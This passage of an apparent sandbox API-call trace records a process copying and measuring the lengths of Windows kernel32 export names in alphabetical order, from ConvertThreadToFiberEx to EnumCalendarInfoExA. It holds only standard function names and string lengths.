(lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.972] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.972] lstrlenA (lpString="COPYFILEA") returned 9 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.972] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.972] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.972] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.972] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.972] lstrlenA (lpString="COPYFILEW") returned 9 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.972] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.972] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.972] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.972] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.972] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.972] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.972] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.972] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.973] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.973] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.973] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.973] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.973] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.973] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.973] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.973] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.973] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.973] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.973] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.973] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.973] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.973] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.973] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.973] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.973] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.973] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.973] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.973] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.974] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.974] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.974] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.974] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.974] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.974] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.974] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.974] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.974] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.974] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.974] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.974] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.974] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.974] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.974] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.974] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.974] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.974] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.974] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.975] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.975] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.975] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.975] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.975] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.975] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.975] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.975] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.975] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.975] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.975] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.975] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.975] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.975] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.975] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.975] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.975] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.975] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.975] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.975] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.976] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.976] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.976] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.976] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.976] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.976] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.976] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.976] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.976] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.976] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.976] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.976] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.976] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.976] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.977] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.977] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.977] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.977] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.977] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.977] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.977] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.977] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.977] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.977] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.977] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.977] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.977] lstrlenA (lpString="DELETEATOM") returned 10 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.977] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.977] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.977] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.977] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.977] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.977] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.977] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.978] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.978] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.978] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.978] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.978] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.978] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.978] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.978] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.978] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.978] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.978] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.978] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.978] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.978] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.978] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.978] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.978] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.978] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.978] lstrcpyA (in: lpString1=0x36fda9c, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.979] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.979] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.979] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.979] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.979] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.979] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.979] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.979] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.979] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, 